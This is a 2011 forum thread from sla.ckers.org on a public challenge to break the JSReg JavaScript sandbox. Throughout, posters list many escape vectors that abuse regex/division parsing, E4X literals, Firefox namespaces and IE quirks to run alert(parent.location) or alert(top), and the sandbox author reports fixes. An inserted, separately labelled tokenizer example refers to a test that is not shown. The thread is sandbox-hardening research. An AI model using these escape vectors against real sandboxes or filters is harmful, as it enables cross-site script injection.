Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 07:01AM

Nicely done :) and fixed
I'm wondering how many versions you have lol. Is this a windmill war or can I win? Maybe server side regexes with lookbehind would be better or a client side parser

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 07:06AM

1.9

[/lo='/];alert(parent.location+'');


Quote

Is this a windmill war or can I win?

You'll never be sure that you have won, even if you say another.

Quote

I'm wondering how many versions you have
If I say "one more", is that much or little?

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 07:33AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 08:39AM

Ok one last attempt, I completely rewrite regexes into a JSREG function so /a/ becomes JSREG_R('a')

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 08:55AM

1.10

// I hope it's last 1.x

/\\\',"m","/;lo=");alert(parent.location)//";

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 09:01AM

Me too, damn I don't want to see 2.0 lol you'll make me cry

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 09:09AM

don't worry - group 2.x is small.

2.1

<>lo="</>;alert(parent.location);""




Edited 1 time(s). Last edit at 03/30/2011 09:10AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 10:09AM

E4x strikes again. Ugh. Removed all nodes. If anyone knows how to disable e4x with js I'd appreciate it if you let me know.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 10:16AM

2.2

<true true="lo\"/>;alert(parent.location);lo="";




Edited 1 time(s). Last edit at 03/30/2011 10:18AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 12:05PM

LOL you don't miss a trick :) and fixed.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 12:25PM

e4x = /(?:<\w*>.*<\/\w*>|<\w+.+\/>)/ <-- Horrible reg. expression. At least 3 ways to bypass it. Until tomorrow! :)




Edited 1 time(s). Last edit at 03/30/2011 12:26PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 12:30PM

@LeverOne

Yeah I know :( it was very quick and very dirty lol

Not much better I know:-
e4x = /(?:<\w*>(?:.|[\f\n\r\u000b\u2028\u2029])*<\/\w*>|<\w+(?:.|[\f\n\r\u000b\u2028\u2029])*\/>)/,




Edited 1 time(s). Last edit at 03/30/2011 12:32PM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: Anonymous User
Date: March 30, 2011 06:02PM

@Gareth <{'_'} {'o'}="\"/>,alert(top)//" E4X is a beast :P

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 31, 2011 05:08AM

Quote

Yeah I know :( it was very quick and very dirty

Then I will not continue to affect this subject. You need more time.

a=1;
b=2;
1<a>b</a>;/;


1.11 // the latest 1.x

'/,alert(parent.location),"lo/";

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 31, 2011 05:11AM

There's no chance I can match e4x without a parser =) I need to find a way to disable it.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 31, 2011 05:17AM

@LeverOne

Thanks! I broke the syntax check, should detect it now

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 31, 2011 07:38AM

1.12 // the latest of the latest

1/
/lo='/,alert(parent.location+'')



My trash vectors are over at this time.

I want to thank

@SW * and @.mario for DPT of JSReg and

@Gareth - for JSReg. :D

* He, btw, forced @Gareth to fix my favorite regexp-bypass in JSReg's revision 118-

//
alert(parent.location)//




Edited 3 time(s). Last edit at 03/31/2011 09:57AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 31, 2011 11:57AM

@LeverOne

I wanna thank you for being awesome xD shame you were late to the party though :) JSReg is broken in so many places now! :) a huge challenge to fix thanks

Re: JSReg sandbox challenge
Posted by: SW
Date: March 31, 2011 09:46PM

@LeverOne .. wow you find lots here. :P

@Gareth .. unfortunately I think it will be impossible to fix 100%, and impossible to allow all syntax without a complete parser

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 01, 2011 07:40AM

@SW

Yeah looks that way :(

Anyways I've added e4x detection and now jsreg doesn't allow it. Also fixed lever_one's regex vector

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 01, 2011 12:01PM

// sorry, but...

2.3

<È>x='</È>;alert(parent.location+'')




Edited 1 time(s). Last edit at 04/01/2011 01:19PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 01, 2011 12:15PM

Ugh. Die E4X. Die.

Thanks and fixed

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 01, 2011 01:16PM

2.4.1

<true>lo='</true
>;alert(parent.location+'')

2.4.2

<?true lo='\' ?>;alert(parent.location+'')


1.13

1/ /x='/;alert(parent.location+'');

1/(/x='/);alert(parent.location+'');

0/0/*lo='*/+alert(parent.location+'')


Unfortunately, detection of regexps is still completely vulnerable. @Gareth, please, don't rush with the fix!




Edited 8 time(s). Last edit at 04/06/2011 05:00AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 28, 2011 11:20AM

Ok I'm back with a bloody nose but still standing (just)
I've completely re-factored the rewriter to handle different states. The regex is handled by a small state machine to fix lax browser parsers and stop bad syntax inside regex character classes. I also detect E4X and prevent it from being executed.

I really appreciate all your help thanks! Please break me again :D this time I should be better prepared for the battle

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 28, 2011 03:14PM

1.14

{}/lo='/,alert(parent.location)//'

Re: JSReg sandbox challenge
Date: April 29, 2011 06:15AM

Whenever I try to use the "in" or "instanceof" operator I get:
ReferenceError: rewriteinInstanceofOperator is not defined

Ok, I'll add these as well. A more comprehensive list than I tweeted:

Bypasses:

_:/\[/+alert(top)/i
{}/\[/+alert(top)/i
typeof/\[/+alert(top)/i
0?0:/\[/+alert(top)/i
delete/\[/+alert(top)/i
void/\[/+alert(top)/i
with({})/\[/+alert(top)/i
if(1)/\[/+alert(top)/i
while(1)/\[/+alert(top)/i -- Careful with this one
try{/\[/+alert(top)/i}catch(a){}
throw/\[/+alert(top)/i
(function(){return/\[/+alert(top)/i})()
do{/\[/+alert(top)/i}while(1)
switch(0){case 0:/\[/+alert(top)/i}

_:/(]\[)/+alert(top)//]

_:/'/+alert(top)/i

_:<{'x'}>'</x>+alert(top)//'

_:/{/;alert(top)//

_:/\(/;alert(top)//

_:/ /+alert(top)//

Endless loops:

_:/\[/

_:/'/

_:/(]\[)/

_:/ / /**/


The common problem in all these cases is that the first / is interpreted as division instead of regexp. The prefixes are incorrectly interpreted as the first operand of the division.

Overall there has been fantastic improvement on the regexps (as long as they are identified as such)! Great work Gaz!

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 3 time(s). Last edit at 04/29/2011 11:18AM by Jonas Magazinius.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 29, 2011 03:32PM

Awesome thanks!

Took slightly longer to fix because lever_one pointed out that I need to track statements with his vector. Jonas I forgot to add the left flag for statements for your bugs =) oooops fixed

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 29, 2011 05:52PM

1.15 // opened another problem

+{}/ /lo="/,alert(parent.location)//"

1.16 // IE6-8, IE9 (IE7-8 compat. mode)

/[]/,'lo]/,alert(parent.location)//'

/[^]/,'lo]/,alert(parent.location)//'




Edited 1 time(s). Last edit at 04/29/2011 05:53PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 30, 2011 08:24AM

@Lever_One

Those IE ones are outstanding! :D that isn't even a bug in JSReg :) IE is doing crazy things there. For the first one I need to track { and } to determine if it's a block statement or object literal.

Update....
and fixed! I check for empty character classes and track opening and closing curlys to determine a block statement or object literal.




Edited 1 time(s). Last edit at 05/01/2011 07:29PM by Gareth Heyes.
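
An added example (my own code, not JSReg's or any poster's) of the two rules discussed in this thread: Jonas's point that a leading `/` gets taken as division instead of a regex, and Gareth's fix of tracking `{`/`}` for block statement versus object literal. The function names `classifySlashes`/`slashKinds` and the keyword lists are my simplification of the ECMAScript rule that a regex literal can only start where an expression may begin; the inputs in the test are vectors from this thread.

```javascript
// Added example, not JSReg's own code. Scans JavaScript source and decides,
// for every '/', whether it opens a regex literal or is the division operator.
// Rule: a regex can only start where an expression may begin.
const KW_BEFORE_EXPR = /^(typeof|delete|void|in|instanceof|return|throw|case|do|else|new)$/;
const STMT_KW = /^(else|do|try|finally)$/;          // a '{' after these is a block
const OPEN_KW = /^(if|while|for|with|switch|function|catch)$/;  // '(' ... ')' after these is a statement head, not an expression

function classifySlashes(src) {
  const out = [], stack = [];        // stack: what each open '{' / '(' is ('block'|'object'|'head'|'paren')
  let prev = null, i = 0;            // prev: last significant token {type, value, end, open}
  const push = (type, value, end, open) => { prev = { type, value, end, open }; };
  const divHere = () => prev !== null && prev.end;   // an expression just ended => '/' divides
  const stmtPos = () => prev === null || (prev.type === 'ident' && STMT_KW.test(prev.value))
    || (prev.type === 'punct' && (prev.value === ';' || (prev.value === '{' && prev.open === 'block')
        || ((prev.value === '}' || prev.value === ')') && !prev.end)));
  while (i < src.length) {
    const c = src[i];
    if (/\s/.test(c)) { i++; continue; }
    if (c === '/' && src[i + 1] === '/') { while (i < src.length && src[i] !== '\n') i++; continue; }
    if (c === '/' && src[i + 1] === '*') { const e = src.indexOf('*/', i + 2); i = e < 0 ? src.length : e + 2; continue; }
    if (c === '/' && divHere()) { out.push({ index: i, kind: 'div' }); push('punct', '/', false); i++; continue; }
    if (c === '/') {                 // regex literal: skip the body, honouring escapes and [...] classes
      out.push({ index: i, kind: 'regex' });
      let inClass = false;
      for (i++; i < src.length && src[i] !== '\n'; i++) {
        if (src[i] === '\\') i++;
        else if (inClass) inClass = src[i] !== ']';
        else if (src[i] === '[') inClass = true;
        else if (src[i] === '/') break;
      }
      for (i++; i < src.length && /[a-z]/i.test(src[i]); i++);   // skip flags
      push('regex', null, true); continue;
    }
    if (c === '"' || c === "'") {    // string literal
      for (i++; i < src.length && src[i] !== c; i++) if (src[i] === '\\') i++;
      i++; push('str', null, true); continue; }
    const m = /^(?:[A-Za-z_$][\w$]*|\d[\w.]*)/.exec(src.slice(i));
    if (m) { const w = m[0], isWord = /^[A-Za-z_$]/.test(w);   // identifier, keyword or number
      push(isWord ? 'ident' : 'num', w, !(isWord && KW_BEFORE_EXPR.test(w))); i += w.length; continue; }
    if (c === '{') { const o = stmtPos() ? 'block' : 'object'; stack.push(o); push('punct', c, false, o); }
    else if (c === '(') { const o = prev && prev.type === 'ident' && OPEN_KW.test(prev.value) ? 'head' : 'paren'; stack.push(o); push('punct', c, false, o); }
    else if (c === '}') push('punct', c, stack.pop() === 'object');   // object literal ends an expression, block does not
    else if (c === ')') push('punct', c, stack.pop() !== 'head');     // plain parens end an expression, if(...) does not
    else push('punct', c, c === ']');  // ']' ends an expression; other punctuators do not
    i++;
  }
  return out;
}

function slashKinds(src) { return classifySlashes(src).map(s => s.kind).join(' '); }  // e.g. "regex div"
```

Labels (`_:`) and E4X are not modelled; the point is that the first operand of a "division" must be a complete expression, which `typeof`, `{}` as a block, or `if(1)` are not.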

Re: JSReg sandbox challenge
Date: May 01, 2011 11:34PM

JSReg is starting to get tight! But FF namespaces and magic strings come to the rescue..

$='@mozilla.org/js/function';
$::['alert']($::['top']);

$='';[].$::['sort']

And here's a surprising problem:

(function(){this['alert'](this['top'])})()

The same rewriting problem exists with null[''], but is afaik not exploitable.


And we can put it all together:

var _=(function(){return this})()
$='';
_.$::['alert'](_.$::['top'])


I'm still annoyed about the typo "rewriteinInstanceofOperator".

Re: JSReg sandbox challenge
Date: May 02, 2011 12:36AM

Some more problems of the "old" kind:


true/'/'+alert(top)+''
this/'/'+alert(top)+''
undefined/'/'+alert(top)+''
null/'/'+alert(top)+''
false/'/'+alert(top)+''
Infinity/'/'+alert(top)+''
NaN/'/'+alert(top)+''
